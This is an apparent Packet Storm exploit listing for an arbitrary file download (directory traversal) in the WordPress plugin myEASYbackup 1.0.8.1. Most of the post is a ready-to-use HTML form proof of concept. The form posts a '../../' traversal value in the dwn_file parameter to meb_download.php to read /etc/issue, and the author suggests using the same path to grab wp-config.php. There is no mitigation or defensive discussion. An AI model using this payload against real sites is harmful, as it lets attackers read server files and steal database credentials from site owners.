Lucene search

K
packetstormAntiphastrophusPACKETSTORM:108711
HistoryJan 16, 2012 - 12:00 a.m.

WordPress myEASYbackup 1.0.8.1 Directory Traversal

2012-01-1600:00:00
antiphastrophus
packetstormsecurity.com
17
`wordpress plugin myEASYbackup 1.0.8.1 arbitrary file download  
http://wordpress.org/extend/plugins/myeasybackup/  
  
parameter "dwn_file" (post)  
script "meb_download.php"  
you can get wp-config.php or whatever (using advanced directory traversal  
technology)!  
  
  
<form method="post" action="http://CENSORED/wp-content/plugins/myeasybackup/meb_download.php">  
<input type="text" name="dwn_file" value="../../../../../../../../etc/issue">  
<input type="submit">  
</form>  
  
  
  
author: antiphastrophus  
`